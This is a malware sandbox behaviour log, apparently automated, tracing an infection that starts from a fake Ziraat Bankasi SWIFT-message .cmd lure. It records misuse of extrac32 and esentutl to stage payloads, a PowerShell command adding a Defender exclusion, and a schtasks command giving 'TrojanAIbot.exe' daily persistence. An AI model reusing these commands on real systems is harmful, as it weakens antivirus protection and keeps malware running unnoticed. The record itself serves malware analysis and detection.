                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd" "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" "Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /oJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pifJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe" Jump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:33 /du 23:59 /sc daily /ri 1 /f
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp9170.tmp.cmd""
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 6
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: url.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ieframe.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??????p.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
